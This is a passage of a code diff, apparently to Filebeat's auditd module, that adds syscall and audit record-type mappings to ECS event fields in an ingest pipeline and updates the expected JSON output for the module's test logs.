checked-metadata-of + category: + - file + type: + - info + finit_module: + - event: + action: + - loaded-kernel-module + category: + - driver + type: + - start + fremovexattr: + - event: + action: + - changed-file-attributes-of + category: + - file + type: + - change + fsetxattr: + - event: + action: + - changed-file-attributes-of + category: + - file + type: + - change + fstat: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + fstatat: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + fstatfs: + - event: + action: + - checked-filesystem-metadata-of + category: + - file + type: + - info + ftruncate: + - event: + action: + - opened-file + category: + - file + type: + - change + futimens: + - event: + action: + - changed-timestamp-of + category: + - file + type: + - info + futimesat: + - event: + action: + - changed-timestamp-of + category: + - file + type: + - info + getxattr: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + init_module: + - event: + action: + - loaded-kernel-module + category: + - driver + type: + - start + kill: + - event: + action: + - killed-pid + category: + - process + type: + - end + lchown: + - event: + action: + - changed-file-ownership-of + category: + - file + type: + - change + lgetxattr: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + listen: + - event: + action: + - listen-for-connections + category: + - network + type: + - start + lremovexattr: + - event: + action: + - changed-file-attributes-of + category: + - file + type: + - change + lsetxattr: + - event: + action: + - changed-file-attributes-of + category: + - file + type: + - change + lstat: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + mkdir: + - event: + action: + - created-directory + category: + - file + type: + - creation + mkdirat: + - event: + action: + - created-directory + category: + - file + type: + - creation + mknod: + - event: + action: + - make-device + category: + - file + type: + - creation + mknodat: + - event: + action: + - make-device + category: + - file + type: + - creation + mmap: + - event: + action: + - allocated-memory + category: + - process + type: + - info + mmap2: + - event: + action: + - allocated-memory + category: + - process + type: + - info + mount: + - event: + action: + - mounted + category: + - file + type: + - creation + newfstatat: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + open: + - event: + action: + - opened-file + category: + - file + type: + - info + openat: + - event: + action: + - opened-file + category: + - file + type: + - info + read: + - event: + action: + - read-file + category: + - file + type: + - info + readlink: + - event: + action: + - opened-file + category: + - file + type: + - info + readlinkat: + - event: + action: + - opened-file + category: + - file + type: + - info + recv: + - event: + action: + - received-from + category: + - network + type: + - connection + - info + recvfrom: + - event: + action: + - received-from + category: + - network + type: + - connection + - info + recvmmsg: + - event: + action: + - received-from + category: + - network + type: + - connection + - info + recvmsg: + - event: + action: + - received-from + category: + - network + type: + - connection + - info + removexattr: + - event: + action: + - changed-file-attributes-of + category: + - file + type: + - change + rename: + - event: + action: + - renamed + category: + - file + type: + - change + renameat: + - event: + action: + - renamed + category: + - file + type: + - change + renameat2: + - event: + action: + - renamed + category: + - file + type: + - change + rmdir: + - event: + action: + - deleted + category: + - file + type: + - deletion + sched_setattr: + - event: + action: + - adjusted-scheduling-policy-of + category: + - process + type: + - change + sched_setparam: + - event: + action: + - adjusted-scheduling-policy-of + category: + - process + type: + - change + sched_setscheduler: + - event: + action: + - adjusted-scheduling-policy-of + category: + - process + type: + - change + send: + - event: + action: + - sent-to + category: + - network + type: + - connection + - info + sendmmsg: + - event: + action: + - sent-to + category: + - network + type: + - connection + - info + sendmsg: + - event: + action: + - sent-to + category: + - network + type: + - connection + - info + sendto: + - event: + action: + - sent-to + category: + - network + type: + - connection + - info + setdomainname: + - event: + action: + - changed-system-name + category: + - host + type: + - change + setegid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + seteuid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + setfsgid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + setfsuid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + setgid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + sethostname: + - event: + action: + - changed-system-name + category: + - host + type: + - change + setregid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + setresgid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + setresuid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + setreuid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + settimeofday: + - event: + action: + - changed-system-time + category: + - host + type: + - change + setuid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + setxattr: + - event: + action: + - changed-file-attributes-of + category: + - file + type: + - change + stat: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + stat64: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + statfs: + - event: + action: + - checked-filesystem-metadata-of + category: + - file + type: + - info + stime: + - event: + action: + - changed-system-time + category: + - host + type: + - change + symlink: + - event: + action: + - symlinked + category: + - file + type: + - creation + symlinkat: + - event: + action: + - symlinked + category: + - file + type: + - creation + tgkill: + - event: + action: + - killed-pid + category: + - process + type: + - end + tkill: + - event: + action: + - killed-pid + category: + - process + type: + - end + truncate: + - event: + action: + - opened-file + category: + - file + type: + - change + umount: + - event: + action: + - unmounted + category: + - file + type: + - deletion + umount2: + - event: + action: + - unmounted + category: + - file + type: + - deletion + unlink: + - event: + action: + - deleted + category: + - file + type: + - deletion + unlinkat: + - event: + action: + - deleted + category: + - file + type: + - deletion + utime: + - event: + action: + - changed-timestamp-of + category: + - file + type: + - info + utimensat: + - event: + action: + - changed-timestamp-of + category: + - file + type: + - info + utimes: + - event: + action: + - changed-timestamp-of + category: + - file + type: + - info + write: + - event: + action: + - wrote-to-file + category: + - file + type: + - change + types: + ACCT_LOCK: + - event: + action: + - locked-account + category: + - iam + type: + - user + - info + ACCT_UNLOCK: + - event: + action: + - unlocked-account + category: + - iam + type: + - user + - info + ADD_GROUP: + - copy: + - from: + - auid + to: user + - from: + - uid + to: user.effective + - from: + - id + - acct + to: group + event: + action: + - added-group-account-to + category: + - iam + type: + - group + - creation + ADD_USER: + - copy: + - from: + - auid + to: user + - from: + - uid + to: user.effective + - from: + - id + - acct + to: user.target + event: + action: + - added-user-account + category: + - iam + type: + - user + - creation + ANOM_ABEND: + - event: + action: + - crashed-program + category: + - process + type: + - end + ANOM_EXEC: + - event: + action: + - attempted-execution-of-forbidden-program + category: + - process + type: + - start + ANOM_LINK: + - event: + action: + - used-suspicious-link + ANOM_LOGIN_FAILURES: + - event: + action: + - failed-log-in-too-many-times-to + ANOM_LOGIN_LOCATION: + - event: + action: + - attempted-log-in-from-unusual-place-to + ANOM_LOGIN_SESSIONS: + - event: + action: + - opened-too-many-sessions-to + ANOM_LOGIN_TIME: + - event: + action: + - attempted-log-in-during-unusual-hour-to + ANOM_PROMISCUOUS: + - event: + action: + - changed-promiscuous-mode-on-device + ANOM_RBAC_INTEGRITY_FAIL: + - event: + action: + - tested-file-system-integrity-of + AVC: + - event: + action: + - violated-selinux-policy + has_fields: + - seresult + - event: + action: + - violated-apparmor-policy + has_fields: + - apparmor + CHGRP_ID: + - event: + action: + - changed-group + category: + - process + type: + - change + CHUSER_ID: + - event: + action: + - changed-user-id + category: + - process + type: + - change + CONFIG_CHANGE: + - event: + action: + - changed-audit-configuration + category: + - process + - configuration + type: + - change + CRED_ACQ: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - acquired-credentials + category: + - authentication + type: + - info + CRED_DISP: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - disposed-credentials + category: + - authentication + type: + - info + CRED_REFR: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - refreshed-credentials + category: + - authentication + type: + - info + CRYPTO_KEY_USER: + - event: + action: + - negotiated-crypto-key + category: + - process + type: + - info + CRYPTO_LOGIN: + - event: + action: + - crypto-officer-logged-in + CRYPTO_LOGOUT: + - event: + action: + - crypto-officer-logged-out + category: + - process + type: + - info + CRYPTO_SESSION: + - event: + action: + - started-crypto-session + category: + - process + type: + - info + DAC_CHECK: + - event: + action: + - access-result + DAEMON_ABORT: + - event: + action: + - aborted-auditd-startup + category: + - process + type: + - stop + DAEMON_ACCEPT: + - event: + action: + - remote-audit-connected + category: + - network + type: + - connection + - start + DAEMON_CLOSE: + - event: + action: + - remote-audit-disconnected + category: + - network + type: + - connection + - start + DAEMON_CONFIG: + - event: + action: + - changed-auditd-configuration + category: + - process + - configuration + type: + - change + DAEMON_END: + - event: + action: + - shutdown-audit + category: + - process + type: + - stop + DAEMON_ERR: + - event: + action: + - audit-error + category: + - process + type: + - info + DAEMON_RECONFIG: + - event: + action: + - reconfigured-auditd + category: + - process + - configuration + type: + - info + DAEMON_RESUME: + - event: + action: + - resumed-audit-logging + category: + - process + type: + - change + DAEMON_ROTATE: + - event: + action: + - rotated-audit-logs + category: + - process + type: + - change + DAEMON_START: + - event: + action: + - started-audit + category: + - process + type: + - start + DEL_GROUP: + - copy: + - from: + - auid + to: user + - from: + - uid + to: user.effective + - from: + - id + - acct + to: group + event: + action: + - deleted-group-account-from + category: + - iam + type: + - group + - deletion + DEL_USER: + - copy: + - from: + - auid + to: user + - from: + - uid + to: user.effective + - from: + - id + - acct + to: user.target + event: + action: + - deleted-user-account + category: + - iam + type: + - user + - deletion + FEATURE_CHANGE: + - event: + action: + - changed-audit-feature + category: + - configuration + type: + - change + FS_RELABEL: + - event: + action: + - relabeled-filesystem + GRP_AUTH: + - copy: + - from: + - auid + to: user + - from: + - uid + to: user.effective + event: + action: + - authenticated-to-group + category: + - authentication + type: + - info + GRP_CHAUTHTOK: + - copy: + - from: + - auid + to: user + - from: + - uid + to: user.effective + - from: + - acct + - id + - uid + to: group + event: + action: + - changed-group-password + category: + - iam + type: + - group + - change + GRP_MGMT: + - copy: + - from: + - auid + to: user + - from: + - uid + to: group + - from: + - uid + to: user.effective + event: + action: + - modified-group-account + category: + - iam + type: + - group + - change + KERNEL: + - event: + action: + - initialized-audit-subsystem + category: + - process + type: + - info + KERN_MODULE: + - event: + action: + - loaded-kernel-module + category: + - driver + type: + - start + LABEL_LEVEL_CHANGE: + - event: + action: + - modified-level-of + LABEL_OVERRIDE: + - event: + action: + - overrode-label-of + LOGIN: + - copy: + - from: + - old_auid + - old-auid + to: user + - from: + - new-auid + - new_auid + - auid + to: user.effective + event: + action: + - changed-login-id-to + category: + - authentication + type: + - start + MAC_CHECK: + - event: + action: + - mac-permission + MAC_CONFIG_CHANGE: + - event: + action: + - changed-selinux-boolean + category: + - configuration + type: + - change + MAC_POLICY_LOAD: + - event: + action: + - loaded-selinux-policy + category: + - configuration + type: + - access + MAC_STATUS: + - event: + action: + - changed-selinux-enforcement + category: + - configuration + type: + - change + NETFILTER_CFG: + - event: + action: + - loaded-firewall-rule-to + category: + - configuration + type: + - change + ROLE_ASSIGN: + - event: + action: + - assigned-user-role-to + category: + - iam + type: + - user + - change + ROLE_MODIFY: + - event: + action: + - modified-role + category: + - iam + type: + - change + ROLE_REMOVE: + - event: + action: + - removed-user-role-from + category: + - iam + type: + - user + - change + SECCOMP: + - event: + action: + - violated-seccomp-policy + SELINUX_ERR: + - event: + action: + - caused-mac-policy-error + SERVICE_START: + - event: + action: + - started-service + category: + - process + type: + - start + SERVICE_STOP: + - event: + action: + - stopped-service + category: + - process + type: + - stop + SOFTWARE_UPDATE: + - event: + action: + - package-updated + category: + - package + type: + - info + SYSTEM_BOOT: + - event: + action: + - booted-system + category: + - host + type: + - start + SYSTEM_RUNLEVEL: + - event: + action: + - changed-to-runlevel + category: + - host + type: + - change + SYSTEM_SHUTDOWN: + - event: + action: + - shutdown-system + category: + - host + type: + - end + TEST: + - event: + action: + - sent-test + category: + - process + type: + - info + TRUSTED_APP: + - event: + action: + - unknown + category: + - process + type: + - info + TTY: + - event: + action: + - typed + USER: + - event: + action: + - sent-message + USER_ACCT: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - was-authorized + category: + - authentication + type: + - info + USER_AUTH: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - authenticated + category: + - authentication + type: + - info + USER_AVC: + - event: + action: + - access-permission + USER_CHAUTHTOK: + - copy: + - from: + - auid + to: user + - from: + - uid + to: user.effective + - from: + - acct + - id + - uid + to: user.target + event: + action: + - changed-password + category: + - iam + type: + - user + - change + USER_CMD: + - event: + action: + - ran-command + category: + - process + type: + - start + USER_END: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - ended-session + category: + - session + type: + - end + USER_ERR: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - error + category: + - authentication + type: + - info + USER_LOGIN: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - logged-in + category: + - authentication + type: + - start + USER_LOGOUT: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - logged-out + category: + - authentication + type: + - end + USER_MAC_CONFIG_CHANGE: + - event: + action: + - changed-mac-configuration + category: + - configuration + type: + - change + USER_MAC_POLICY_LOAD: + - event: + action: + - loaded-mac-policy + category: + - configuration + type: + - access + USER_MGMT: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.target + - from: + - uid + to: user.effective + event: + action: + - modified-user-account + category: + - iam + type: + - user + - change + USER_ROLE_CHANGE: + - event: + action: + - changed-role-to + USER_SELINUX_ERR: + - event: + action: + - access-error + USER_START: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - started-session + category: + - session + type: + - start + USER_TTY: + - event: + action: + - typed + USYS_CONFIG: + - event: + action: + - changed-configuration + category: + - configuration + type: + - change + VIRT_CONTROL: + - event: + action: + - issued-vm-control + category: + - host + type: + - info + VIRT_CREATE: + - event: + action: + - created-vm-image + category: + - host + type: + - info + VIRT_DESTROY: + - event: + action: + - deleted-vm-image + category: + - host + type: + - info + VIRT_INTEGRITY_CHECK: + - event: + action: + - checked-integrity-of + category: + - host + type: + - info + VIRT_MACHINE_ID: + - event: + action: + - assigned-vm-id + category: + - host + type: + - info + VIRT_MIGRATE_IN: + - event: + action: + - migrated-vm-from + category: + - host + type: + - info + VIRT_MIGRATE_OUT: + - event: + action: + - migrated-vm-to + category: + - host + type: + - info + VIRT_RESOURCE: + - event: + action: + - assigned-vm-resource + category: + - host + type: + - info + # END OF AUTOGENERATED source: >- - if (ctx?.auditd?.log.record_type == null) { + boolean hasFields(HashMap base, def list) { + if (list == null) return true; + for (int i=0; i ctx.event[k] = v); + HashMap base = ctx.auditd.log; + def acts = params.types.get(base.record_type); + if (acts == null && base.syscall != null) { + acts = params.syscalls.get(base?.syscall); + if (acts == null) acts = params.syscalls.get('*'); + } + if (acts == null) return; + def act = null; + for (int i=0; act == null && i ctx.event[k] = v); + } + if (act?.copy != null) { + List lst = new ArrayList(); + for(int i=0; i 0) { + ctx.auditd.log["copy"] = lst; + } + } +- foreach: + field: auditd.log.copy + ignore_missing: true + processor: + set: + field: "{{_ingest._value.target}}" + value: "{{_ingest._value.value}}" - set: if: "ctx.auditd.log?.record_type == 'SYSTEM_BOOT' || ctx.auditd.log?.record_type == 'SYSTEM_SHUTDOWN'" field: event.category @@ -499,6 +2151,14 @@ processors: field: source.as.organization_name target_field: source.as.organization.name ignore_missing: true +- remove: + field: + - auditd.log.kv + - auditd.log.sub_kv + - auditd.log.epoch + - auditd.log.copy + ignore_failure: true + ignore_missing: true on_failure: - set: field: error.message diff --git a/filebeat/module/auditd/log/test/audit-cent7-node.log-expected.json b/filebeat/module/auditd/log/test/audit-cent7-node.log-expected.json index c9d2b77a6e4d..8debfbba37fe 100644 --- a/filebeat/module/auditd/log/test/audit-cent7-node.log-expected.json +++ b/filebeat/module/auditd/log/test/audit-cent7-node.log-expected.json @@ -5,15 +5,25 @@ "auditd.log.kernel": "3.10.0-1062.9.1.el7.x86_64", "auditd.log.node": "localhost.localdomain", "auditd.log.op": "start", + "auditd.log.record_type": "DAEMON_START", "auditd.log.sequence": 4686, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:auditd_t:s0", "auditd.log.ver": "2.8.5", - "event.action": "daemon_start", + "event.action": [ + "started-audit" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=DAEMON_START msg=audit(1594053514.588:4686): op=start ver=2.8.5 format=raw kernel=3.10.0-1062.9.1.el7.x86_64 auid=4294967295 pid=1643 uid=0 ses=4294967295 subj=system_u:system_r:auditd_t:s0 res=success", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 0, @@ -27,16 +37,21 @@ "auditd.log.audit_backlog_limit": "8192", "auditd.log.node": "localhost.localdomain", "auditd.log.old": "64", + "auditd.log.record_type": "CONFIG_CHANGE", "auditd.log.sequence": 4, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:unconfined_service_t:s0", - "event.action": "config_change", + "event.action": [ + "changed-audit-configuration" + ], "event.category": [ + "process", "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=CONFIG_CHANGE msg=audit(1594053514.707:4): audit_backlog_limit=8192 old=64 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 res=1", "event.outcome": "1", "event.type": [ "change" @@ -52,16 +67,21 @@ "auditd.log.audit_failure": "1", "auditd.log.node": "localhost.localdomain", "auditd.log.old": "1", + "auditd.log.record_type": "CONFIG_CHANGE", "auditd.log.sequence": 5, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:unconfined_service_t:s0", - "event.action": "config_change", + "event.action": [ + "changed-audit-configuration" + ], "event.category": [ + "process", "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=CONFIG_CHANGE msg=audit(1594053514.707:5): audit_failure=1 old=1 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 res=1", "event.outcome": "1", "event.type": [ "change" @@ -75,15 +95,25 @@ { "@timestamp": "2020-07-06T16:38:34.709Z", "auditd.log.node": "localhost.localdomain", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 6, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "auditd", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=SERVICE_START msg=audit(1594053514.709:6): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=auditd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 606, @@ -97,14 +127,18 @@ { "@timestamp": "2020-07-06T16:38:34.725Z", "auditd.log.node": "localhost.localdomain", + "auditd.log.record_type": "SYSTEM_BOOT", "auditd.log.sequence": 7, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", - "event.action": "system_boot", + "event.action": [ + "booted-system" + ], "event.category": "host", "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=SYSTEM_BOOT msg=audit(1594053514.725:7): pid=1667 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg=' comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", "event.type": "info", "fileset.name": "log", @@ -120,15 +154,25 @@ { "@timestamp": "2020-07-06T16:38:34.739Z", "auditd.log.node": "localhost.localdomain", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 8, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "systemd-update-utmp", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=SERVICE_START msg=audit(1594053514.739:8): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=systemd-update-utmp comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1132, @@ -142,15 +186,25 @@ { "@timestamp": "2020-07-06T16:38:34.807Z", "auditd.log.node": "localhost.localdomain", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 9, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "rngd", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=SERVICE_START msg=audit(1594053514.807:9): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=rngd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1401, @@ -164,15 +218,25 @@ { "@timestamp": "2020-07-06T16:38:34.843Z", "auditd.log.node": "localhost.localdomain", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 10, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "irqbalance", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=SERVICE_START msg=audit(1594053514.843:10): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=irqbalance comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1655, @@ -186,15 +250,25 @@ { "@timestamp": "2020-07-06T16:38:34.850Z", "auditd.log.node": "localhost.localdomain", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 11, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "abrtd", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=SERVICE_START msg=audit(1594053514.850:11): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=abrtd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 1916, @@ -208,15 +282,25 @@ { "@timestamp": "2020-07-06T16:38:34.857Z", "auditd.log.node": "localhost.localdomain", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 12, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "abrt-xorg", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "node=localhost.localdomain type=SERVICE_START msg=audit(1594053514.857:12): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=abrt-xorg comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 2172, diff --git a/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json b/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json index d3c3a6561ab2..215c0bf11f91 100644 --- a/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json +++ b/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json @@ -2,13 +2,24 @@ { "@timestamp": "2017-03-14T19:20:30.178Z", "auditd.log.op": "PAM:session_close", + "auditd.log.record_type": "USER_END", "auditd.log.sequence": 19600327, "auditd.log.ses": "11988", - "event.action": "user_end", + "auditd.log.uid": "0", + "event.action": [ + "ended-session" + ], + "event.category": [ + "session" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=USER_END msg=audit(1489519230.178:19600327): user pid=4121 uid=0 auid=700 ses=11988 msg='op=PAM:session_close acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "end" + ], "fileset.name": "log", "input.type": "log", "log.offset": 0, @@ -16,19 +27,31 @@ "process.pid": 4121, "service.type": "auditd", "user.audit.id": "700", - "user.id": "0", + "user.effective.name": "root", + "user.id": "700", "user.name": "root" }, { "@timestamp": "2017-03-14T19:20:30.178Z", "auditd.log.op": "PAM:setcred", + "auditd.log.record_type": "CRED_DISP", "auditd.log.sequence": 19600328, "auditd.log.ses": "11988", - "event.action": "cred_disp", + "auditd.log.uid": "0", + "event.action": [ + "disposed-credentials" + ], + "event.category": [ + "authentication" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=CRED_DISP msg=audit(1489519230.178:19600328): user pid=4121 uid=0 auid=700 ses=11988 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "info" + ], "fileset.name": "log", "input.type": "log", "log.offset": 189, @@ -36,18 +59,29 @@ "process.pid": 4121, "service.type": "auditd", "user.audit.id": "700", - "user.id": "0", + "user.effective.name": "root", + "user.id": "700", "user.name": "root" }, { "@timestamp": "2017-03-14T19:20:56.192Z", + "auditd.log.record_type": "USER_CMD", "auditd.log.sequence": 19600329, "auditd.log.ses": "11988", - "event.action": "user_cmd", + "event.action": [ + "ran-command" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=USER_CMD msg=audit(1489519256.192:19600329): user pid=4151 uid=497 auid=700 ses=11988 msg='cwd=\"/\" cmd=2F7573722F6C696236342F6E6167696F732F706C7567696E732F636865636B5F617374657269736B5F7369705F7065657273202D7020323032 terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 373, @@ -66,13 +100,24 @@ { "@timestamp": "2017-03-14T19:20:56.193Z", "auditd.log.op": "PAM:setcred", + "auditd.log.record_type": "CRED_ACQ", "auditd.log.sequence": 19600330, "auditd.log.ses": "11988", - "event.action": "cred_acq", + "auditd.log.uid": "0", + "event.action": [ + "acquired-credentials" + ], + "event.category": [ + "authentication" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=CRED_ACQ msg=audit(1489519256.193:19600330): user pid=4151 uid=0 auid=700 ses=11988 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "info" + ], "fileset.name": "log", "input.type": "log", "log.offset": 620, @@ -80,19 +125,31 @@ "process.pid": 4151, "service.type": "auditd", "user.audit.id": "700", - "user.id": "0", + "user.effective.name": "root", + "user.id": "700", "user.name": "root" }, { "@timestamp": "2017-03-14T19:20:56.193Z", "auditd.log.op": "PAM:session_open", + "auditd.log.record_type": "USER_START", "auditd.log.sequence": 19600331, "auditd.log.ses": "11988", - "event.action": "user_start", + "auditd.log.uid": "0", + "event.action": [ + "started-session" + ], + "event.category": [ + "session" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=USER_START msg=audit(1489519256.193:19600331): user pid=4151 uid=0 auid=700 ses=11988 msg='op=PAM:session_open acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 803, @@ -100,7 +157,8 @@ "process.pid": 4151, "service.type": "auditd", "user.audit.id": "700", - "user.id": "0", + "user.effective.name": "root", + "user.id": "700", "user.name": "root" }, { @@ -115,6 +173,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=MAC_IPSEC_EVENT msg=audit(1489519382.529:19600354): op=SPD-add auid=4294967295 ses=4294967295 res=1 src=10.100.0.0 src_prefixlen=16 dst=10.100.4.0 dst_prefixlen=22", "event.outcome": "1", "fileset.name": "log", "input.type": "log", @@ -137,9 +196,16 @@ "auditd.log.syscall": "44", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1489519382.529:19600354): arch=c000003e syscall=44 success=yes exit=184 a0=9 a1=7f564ee6d2a0 a2=b8 a3=0 items=0 ppid=1240 pid=1275 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"charon\" exe=2F7573722F6C6962657865632F7374726F6E677377616E2F636861726F6E202864656C6574656429 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -167,17 +233,29 @@ "auditd.log.new_ses": "12286", "auditd.log.old_auid": "700", "auditd.log.old_ses": "6793", + "auditd.log.record_type": "LOGIN", "auditd.log.sequence": 19623791, - "event.action": "login", + "auditd.log.uid": "0", + "event.action": [ + "changed-login-id-to" + ], + "event.category": [ + "authentication" + ], "event.dataset": 